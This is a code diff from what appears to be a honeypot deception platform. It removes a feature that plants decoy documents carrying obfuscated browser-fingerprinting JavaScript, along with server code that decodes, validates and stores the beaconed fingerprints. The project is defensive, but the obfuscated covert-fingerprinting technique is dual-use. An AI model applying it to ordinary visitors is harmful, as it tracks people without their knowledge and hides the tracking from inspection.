    ``_FINGERPRINT_SECRET_ENV``) over ``callback_token + "|" + mint_uuid``.
    Only the first 16 hex characters (64 bits) are kept: enough to defeat
    slug-only forgery while staying short in a query string.

    Raises:
        FingerprintSecretMissing: if the secret is unset or empty.
    """
    key = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if not key:
        raise FingerprintSecretMissing(
            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
        )
    message = (callback_token + "|" + mint_uuid).encode("utf-8")
    mac = hmac.new(key.encode("utf-8"), message, hashlib.sha256)
    return mac.hexdigest()[:16]
|
||||
|
||||
|
||||
def _seed_from_token(callback_token: str) -> int:
|
||||
"""Derive a 31-bit numeric seed from the callback token.
|
||||
|
||||
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||
using a SHA-256-derived prefix gives us a uniform distribution
|
||||
across the 31-bit positive range.
|
||||
"""
|
||||
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||
|
||||
|
||||
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||
"""Build a deterministic, per-mint obfuscator config.
|
||||
|
||||
The hash bits drive *which* transforms apply — two mints get
|
||||
structurally different outputs, not just different identifier names.
|
||||
Defaults stay aggressive enough that reverse engineering is real
|
||||
work; we never disable string-array or rename, only vary the dial.
|
||||
"""
|
||||
bits = seed
|
||||
encodings = ("base64", "rc4")
|
||||
string_array_encoding = [encodings[bits & 1]]
|
||||
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||
transform_object_keys = bool((bits >> 17) & 1)
|
||||
numbers_to_expressions = bool((bits >> 18) & 1)
|
||||
simplify = bool((bits >> 19) & 1)
|
||||
return {
|
||||
"compact": True,
|
||||
"seed": seed,
|
||||
"controlFlowFlattening": True,
|
||||
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||
"deadCodeInjection": True,
|
||||
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||
"stringArray": True,
|
||||
"stringArrayEncoding": string_array_encoding,
|
||||
"stringArrayThreshold": 1,
|
||||
"stringArrayRotate": True,
|
||||
"stringArrayShuffle": True,
|
||||
"splitStrings": True,
|
||||
"splitStringsChunkLength": 4 + (bits & 7),
|
||||
"transformObjectKeys": transform_object_keys,
|
||||
"numbersToExpressions": numbers_to_expressions,
|
||||
"simplify": simplify,
|
||||
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||
"renameGlobals": False,
|
||||
"identifierNamesGenerator": "mangled-shuffled",
|
||||
}
|
||||
|
||||
|
||||
def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.

    The seed and obfuscator options are derived from the token, sent
    together with the source as a JSON document on the Node helper's
    stdin, and the helper's stdout is returned unchanged.

    Raises:
        ObfuscatorError: if the Node binary cannot be found or launched,
            the helper times out, exits non-zero, or prints only
            whitespace.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    except OSError as e:
        # Other launch failures (e.g. a non-executable binary) must also
        # surface as ObfuscatorError so callers handle one exception type.
        raise ObfuscatorError(
            f"failed to launch node binary {_NODE_BIN!r}: {e}"
        ) from e
    if proc.returncode != 0:
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
|
||||
|
||||
|
||||
def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
    """Produce the obfuscated fingerprint JS for one mint.

    The payload template is read from ``_PAYLOAD`` and its
    ``{{BEACON_URL}}``, ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}``
    placeholders are filled in, in that order. The result is then passed
    to :func:`obfuscate`, which seeds itself from the callback token.

    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
    the row's :attr:`CanaryToken.fingerprint_nonce`.
    """
    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
    substitutions = (
        ("{{BEACON_URL}}", beacon),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    src = _PAYLOAD.read_text(encoding="utf-8")
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return obfuscate(src, callback_token=callback_token)
|
||||
@@ -1,10 +0,0 @@
|
||||
{
|
||||
"name": "decnet-canary-obfuscator",
|
||||
"version": "0.1.0",
|
||||
"private": true,
|
||||
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||
"main": "_obfuscate_helper.js",
|
||||
"dependencies": {
|
||||
"javascript-obfuscator": "^5.4.2"
|
||||
}
|
||||
}
|
||||
@@ -28,8 +28,6 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
@@ -40,8 +38,6 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -20,8 +20,11 @@ shape but speaks bytes-via-base64 over the wire.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import os
|
||||
from datetime import datetime, timedelta, timezone
|
||||
import shlex
|
||||
import time
|
||||
from secrets import token_urlsafe
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
@@ -31,16 +34,13 @@ from decnet.bus.factory import get_bus
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.canary.paths import default_path_for
|
||||
from decnet.decky_io import (
|
||||
delete_file_from_container,
|
||||
resolve_topology_container,
|
||||
write_file_to_container,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
log = get_logger("canary.planter")
|
||||
|
||||
_DOCKER = "docker"
|
||||
_TIMEOUT = 8.0
|
||||
# Container suffix — matches the orchestrator SSH driver's convention
|
||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||
# ssh container because every decky has one and it carries the most
|
||||
@@ -52,16 +52,62 @@ def _container_for(decky_name: str) -> str:
|
||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||
|
||||
|
||||
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||
# with callers (tests, deploy hook) that imported it from this module
|
||||
# before the decky_io extraction.
|
||||
__all__ = [
|
||||
"plant",
|
||||
"revoke",
|
||||
"resolve_topology_container",
|
||||
"seed_baseline",
|
||||
"seed_baseline_topology",
|
||||
]
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _run(
|
||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
||||
) -> tuple[int, str, str]:
|
||||
try:
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv,
|
||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||
stdout=asyncio.subprocess.PIPE,
|
||||
stderr=asyncio.subprocess.PIPE,
|
||||
)
|
||||
except FileNotFoundError as exc:
|
||||
return 127, "", f"argv[0] not found: {exc}"
|
||||
try:
|
||||
stdout, stderr = await asyncio.wait_for(
|
||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
||||
)
|
||||
except asyncio.TimeoutError:
|
||||
try:
|
||||
proc.kill()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return 124, "", "timeout"
|
||||
return (
|
||||
proc.returncode if proc.returncode is not None else -1,
|
||||
stdout.decode("utf-8", "replace"),
|
||||
stderr.decode("utf-8", "replace"),
|
||||
)
|
||||
|
||||
|
||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
    """Build the ``sh -c`` script and the stdin payload for one artifact.

    The content is base64-encoded on the host and decoded by ``base64 -d``
    inside the container, so the bytes travel over stdin and never appear
    in argv (where kernel ARG_MAX would cap the size). The script creates
    the parent directory, writes the file, applies the mode and finally
    sets the mtime to "now + ``artifact.mtime_offset``" as a Unix
    timestamp.

    Returns:
        ``(script, encoded)``: the ``&&``-joined shell script and the
        base64-encoded content to feed on stdin.
    """
    target = shlex.quote(artifact.path)
    parent = shlex.quote(_dirname(artifact.path))
    stamp = int(time.time() + artifact.mtime_offset)
    perms = oct(artifact.mode)[2:]  # drop the "0o" prefix for chmod
    script = " && ".join(
        (
            f"mkdir -p {parent}",
            f"base64 -d > {target}",
            f"chmod {perms} {target}",
            f"touch -d @{stamp} {target}",
        )
    )
    return script, base64.b64encode(artifact.content)
|
||||
|
||||
|
||||
async def _publish(
|
||||
@@ -93,7 +139,6 @@ async def plant(
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Write *artifact* into the decky's ssh container.
|
||||
|
||||
@@ -112,12 +157,13 @@ async def plant(
|
||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||
return False, err
|
||||
|
||||
target_container = container or _container_for(decky_name)
|
||||
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||
success, error = await write_file_to_container(
|
||||
target_container, artifact.path, artifact.content,
|
||||
mode=artifact.mode, mtime=mtime,
|
||||
)
|
||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
||||
# consume the encoded payload streamed from the host.
|
||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
if success:
|
||||
@@ -136,8 +182,8 @@ async def plant(
|
||||
|
||||
if not success:
|
||||
log.warning(
|
||||
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||
decky_name, token_uuid, target_container, error,
|
||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
||||
decky_name, token_uuid, rc, stderr[:120],
|
||||
)
|
||||
return success, error
|
||||
|
||||
@@ -150,7 +196,6 @@ async def revoke(
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Best-effort unlink + state transition + bus publish.
|
||||
|
||||
@@ -158,10 +203,11 @@ async def revoke(
|
||||
the file is gone after the call (whether we deleted it or it was
|
||||
already missing); only docker / container-down errors return False.
|
||||
"""
|
||||
target_container = container or _container_for(decky_name)
|
||||
success, error = await delete_file_from_container(
|
||||
target_container, placement_path,
|
||||
)
|
||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||
@@ -204,7 +250,6 @@ async def seed_baseline(
|
||||
persona: str = "linux",
|
||||
created_by: str = "system",
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Plant the configured baseline canary set on one decky.
|
||||
|
||||
@@ -248,59 +293,9 @@ async def seed_baseline(
|
||||
await plant(
|
||||
decky_name, artifact,
|
||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||
container=container,
|
||||
)
|
||||
out.append({
|
||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||
"callback_token": slug, "placement_path": artifact.path,
|
||||
})
|
||||
return out
|
||||
|
||||
|
||||
async def seed_baseline_topology(
|
||||
repo: BaseRepository,
|
||||
topology_id: str,
|
||||
*,
|
||||
created_by: str = "system",
|
||||
bus: Optional[BaseBus] = None,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Plant baseline canaries on every decky in a MazeNET topology.
|
||||
|
||||
Mirrors :func:`seed_baseline` for the topology path. Container name
|
||||
resolution uses :func:`resolve_topology_container` since topology
|
||||
deckies may not have an ssh service — in that case we target the
|
||||
base container instead.
|
||||
|
||||
Best-effort: failures on any single decky are logged inside
|
||||
:func:`plant`; the deploy hook treats the return value as
|
||||
informational. Returns a flat list of per-token dicts (with an added
|
||||
``decky_name`` key) across all deckies.
|
||||
"""
|
||||
from decnet.topology.persistence import hydrate
|
||||
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
log.warning(
|
||||
"canary.seed_baseline_topology: topology %s not found", topology_id,
|
||||
)
|
||||
return []
|
||||
|
||||
out: list[dict[str, Any]] = []
|
||||
for decky in hydrated["deckies"]:
|
||||
cfg = decky.get("decky_config") or {}
|
||||
decky_name = cfg.get("name") or decky.get("name")
|
||||
if not decky_name:
|
||||
continue
|
||||
services = decky.get("services") or []
|
||||
container = resolve_topology_container(topology_id, decky_name, services)
|
||||
# MazeNET deckies don't carry an OS persona today; default to
|
||||
# linux (every base image we ship is Linux).
|
||||
rows = await seed_baseline(
|
||||
decky_name, repo,
|
||||
persona="linux", created_by=created_by, bus=bus,
|
||||
container=container,
|
||||
)
|
||||
for r in rows:
|
||||
r["decky_name"] = decky_name
|
||||
out.append(r)
|
||||
return out
|
||||
|
||||
@@ -26,14 +26,9 @@ crashes loudly rather than masking failures.
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import binascii
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
from typing import Optional
|
||||
|
||||
from fastapi import FastAPI, Request, Response
|
||||
|
||||
@@ -55,41 +50,6 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
||||
)
|
||||
|
||||
|
||||
# Namespace used by fingerprint generators to derive mint UUID.
|
||||
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||
|
||||
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
|
||||
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
|
||||
# Not shared across worker restarts or processes — acceptable for MVP.
|
||||
_FP_RATE_WINDOW_S = 60
|
||||
_FP_RATE_LIMIT = 30
|
||||
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
|
||||
|
||||
|
||||
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
|
||||
key = (token_uuid, src_ip)
|
||||
now = time.monotonic()
|
||||
cutoff = now - _FP_RATE_WINDOW_S
|
||||
bucket = _fp_rate_buckets.get(key, [])
|
||||
bucket = [t for t in bucket if t > cutoff]
|
||||
if len(bucket) >= _FP_RATE_LIMIT:
|
||||
_fp_rate_buckets[key] = bucket
|
||||
return False
|
||||
bucket.append(now)
|
||||
_fp_rate_buckets[key] = bucket
|
||||
return True
|
||||
|
||||
|
||||
def _is_valid_fp_shape(fp: dict) -> bool:
|
||||
"""Layer B — structural sanity check on a decoded fingerprint blob."""
|
||||
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
|
||||
return False
|
||||
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
|
||||
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
|
||||
return present >= 3
|
||||
|
||||
|
||||
def _http_base() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||
|
||||
@@ -144,11 +104,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
|
||||
@app.get("/c/{slug}")
|
||||
async def callback(slug: str, request: Request) -> Response:
|
||||
raw_nonce = request.query_params.get("k")
|
||||
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||
merged_headers = dict(request.headers)
|
||||
if fp_meta:
|
||||
merged_headers.update(fp_meta)
|
||||
await _record_hit(
|
||||
repo, bus,
|
||||
slug=slug,
|
||||
@@ -156,9 +111,7 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
user_agent=request.headers.get("user-agent"),
|
||||
request_path=str(request.url.path),
|
||||
dns_qname=None,
|
||||
raw_headers=merged_headers,
|
||||
parsed_fp=parsed_fp,
|
||||
raw_nonce=raw_nonce,
|
||||
raw_headers=dict(request.headers),
|
||||
)
|
||||
# Always 200 with a tiny image so the attacker's client sees
|
||||
# a "success" — same return regardless of whether the slug is
|
||||
@@ -176,67 +129,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
return app
|
||||
|
||||
|
||||
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
|
||||
# overflow is handled via chunking (s/i/n + d). Anything larger than
|
||||
# this on a single request is junk, so we drop it instead of letting an
|
||||
# attacker inflate a trigger row indefinitely.
|
||||
_FP_CHUNK_MAX = 8 * 1024
|
||||
|
||||
|
||||
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
|
||||
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
|
||||
|
||||
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
|
||||
|
||||
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
|
||||
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
|
||||
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
|
||||
|
||||
Returns a tuple of:
|
||||
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
|
||||
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
|
||||
when there's no ``?d=`` or decoding fails.
|
||||
"""
|
||||
out: dict[str, Any] = {}
|
||||
parsed_fp: Optional[dict] = None
|
||||
if not qp:
|
||||
return out, parsed_fp
|
||||
o = qp.get("o") if hasattr(qp, "get") else None
|
||||
if o:
|
||||
out["_fp_open"] = "1"
|
||||
d = qp.get("d") if hasattr(qp, "get") else None
|
||||
if not d:
|
||||
return out, parsed_fp
|
||||
if len(d) > _FP_CHUNK_MAX:
|
||||
out["_fp_oversize"] = "1"
|
||||
return out, parsed_fp
|
||||
|
||||
sid = qp.get("s")
|
||||
idx = qp.get("i")
|
||||
total = qp.get("n")
|
||||
if sid and idx and total:
|
||||
out["_fp_sid"] = sid
|
||||
out["_fp_idx"] = idx
|
||||
out["_fp_total"] = total
|
||||
out["_fp_chunk"] = d
|
||||
return out, parsed_fp
|
||||
|
||||
# Single-shot: decode and pass back as parsed_fp; validation runs in
|
||||
# _record_hit after token lookup so we have the stored nonce at hand.
|
||||
try:
|
||||
padded = d + "=" * (-len(d) % 4)
|
||||
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
|
||||
parsed = json.loads(raw.decode("utf-8"))
|
||||
except (binascii.Error, ValueError, UnicodeDecodeError):
|
||||
out["_fp_decode_error"] = "1"
|
||||
return out, parsed_fp
|
||||
if isinstance(parsed, dict):
|
||||
parsed_fp = parsed
|
||||
else:
|
||||
out["_fp_decode_error"] = "1"
|
||||
return out, parsed_fp
|
||||
|
||||
|
||||
def _client_ip(request: Request) -> str:
|
||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||
# proxy. Take the leftmost address in the chain; everything after
|
||||
@@ -262,58 +154,16 @@ async def _record_hit(
|
||||
request_path: Optional[str],
|
||||
dns_qname: Optional[str],
|
||||
raw_headers: Optional[dict],
|
||||
parsed_fp: Optional[dict] = None,
|
||||
raw_nonce: Optional[str] = None,
|
||||
) -> None:
|
||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||
|
||||
Unknown slugs are silently swallowed: returning the same response
|
||||
for known and unknown slugs is the stealth posture, and persisting
|
||||
every random scan would clutter the DB.
|
||||
|
||||
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||
it is validated through four layers before being merged into raw_headers:
|
||||
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||
B) structural shape check,
|
||||
C) mint UUID consistency,
|
||||
D) per-(token, IP) rate limit.
|
||||
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
|
||||
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||
"""
|
||||
token = await repo.get_canary_token_by_slug(slug)
|
||||
if token is None:
|
||||
return
|
||||
|
||||
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||
|
||||
if parsed_fp is not None:
|
||||
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||
|
||||
# Layer A — nonce
|
||||
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||
final_headers["_fp_invalid_nonce"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||
final_headers["_fp_invalid_shape"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer C — mint UUID consistency
|
||||
if parsed_fp is not None:
|
||||
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||
if parsed_fp.get("mint") != expected_mint:
|
||||
final_headers["_fp_invalid_mint"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer D — rate limit
|
||||
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||
final_headers["_fp_rate_limited"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
if parsed_fp is not None:
|
||||
final_headers["_fp"] = parsed_fp
|
||||
|
||||
trigger_id = await repo.record_canary_trigger({
|
||||
"token_uuid": token["uuid"],
|
||||
"occurred_at": datetime.now(timezone.utc),
|
||||
@@ -321,7 +171,7 @@ async def _record_hit(
|
||||
"user_agent": user_agent,
|
||||
"request_path": request_path,
|
||||
"dns_qname": dns_qname,
|
||||
"raw_headers": final_headers,
|
||||
"raw_headers": raw_headers or {},
|
||||
})
|
||||
try:
|
||||
await bus.publish(
|
||||
@@ -339,22 +189,6 @@ async def _record_hit(
|
||||
except Exception as e: # noqa: BLE001 — best effort
|
||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||
|
||||
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||
# http/dns canaries are NOT auto-revoked.
|
||||
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||
try:
|
||||
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||
await bus.publish(
|
||||
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||
"reason": "fingerprint_collected"},
|
||||
)
|
||||
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||
|
||||
|
||||
# ---------------------------- DNS surface --------------------------------
|
||||
|
||||
@@ -380,7 +214,7 @@ async def _start_dns_server(
|
||||
local_addr=(_dns_bind(), _dns_port()),
|
||||
)
|
||||
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
||||
return transport
|
||||
return transport # type: ignore[return-value]
|
||||
|
||||
|
||||
# ---------------------------- entry point --------------------------------
|
||||
|
||||
@@ -39,7 +39,6 @@ from . import (
|
||||
swarm,
|
||||
swarmctl,
|
||||
topology,
|
||||
ttp,
|
||||
updater,
|
||||
web,
|
||||
webhook,
|
||||
@@ -60,7 +59,7 @@ for _mod in (
|
||||
swarm,
|
||||
deploy, lifecycle, workers, inventory,
|
||||
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
||||
topology, bus, geoip, init, webhook, canary, ttp,
|
||||
topology, bus, geoip, init, webhook, canary,
|
||||
):
|
||||
_mod.register(app)
|
||||
|
||||
|
||||
@@ -1,13 +1,8 @@
|
||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||
|
||||
Two entry points share this module:
|
||||
|
||||
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||
systemd unit so its argv must stay stable.
|
||||
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||
the API service unit's ``ExecStartPre``.
|
||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
||||
:func:`decnet.canary.worker.run`.
|
||||
|
||||
Not master-only — any host that hosts deckies can run its own
|
||||
canary worker (the bus events stay local; the webhook worker on
|
||||
@@ -16,17 +11,11 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import shutil
|
||||
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||
from pathlib import Path
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
_TOOLCHAIN_TIMEOUT_S = 180
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="canary")
|
||||
@@ -51,53 +40,3 @@ def register(app: typer.Typer) -> None:
|
||||
asyncio.run(run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||
|
||||
@app.command(name="canary-install-toolchain")
|
||||
def canary_install_toolchain(
|
||||
npm_bin: str = typer.Option(
|
||||
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
|
||||
),
|
||||
) -> None:
|
||||
"""Install the Node-side toolchain used by fingerprint canaries.
|
||||
|
||||
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
|
||||
directory so the obfuscator's helper script can ``require()``
|
||||
``javascript-obfuscator`` at mint time. Requires Node >= 18.
|
||||
|
||||
Idempotent: re-running on an already-installed tree is fast
|
||||
(npm short-circuits when ``node_modules/`` is up-to-date).
|
||||
"""
|
||||
import decnet.canary as _canary_pkg
|
||||
canary_dir = Path(_canary_pkg.__file__).resolve().parent
|
||||
if not (canary_dir / "package.json").is_file():
|
||||
console.print(
|
||||
f"[red]canary package.json not found under {canary_dir}; "
|
||||
"wheel may be missing the JS toolchain payload.[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
if shutil.which(npm_bin) is None:
|
||||
console.print(
|
||||
f"[red]npm executable {npm_bin!r} not found on PATH. "
|
||||
"Install Node >= 18 and re-run.[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
console.print(
|
||||
f"[cyan]installing canary toolchain[/] in {canary_dir}",
|
||||
)
|
||||
try:
|
||||
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
|
||||
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
|
||||
cwd=str(canary_dir),
|
||||
capture_output=True, text=True,
|
||||
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
console.print("[red]npm install timed out after 3 minutes[/]")
|
||||
raise typer.Exit(code=3) from None
|
||||
if proc.returncode != 0:
|
||||
console.print(
|
||||
f"[red]npm install failed rc={proc.returncode}[/]\n"
|
||||
f"{proc.stderr.strip()}"
|
||||
)
|
||||
raise typer.Exit(code=proc.returncode)
|
||||
console.print("[green]canary toolchain ready[/]")
|
||||
|
||||
@@ -30,10 +30,6 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
|
||||
"mutate", "listener", "profiler",
|
||||
"services", "distros", "correlate", "archetypes", "web",
|
||||
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
||||
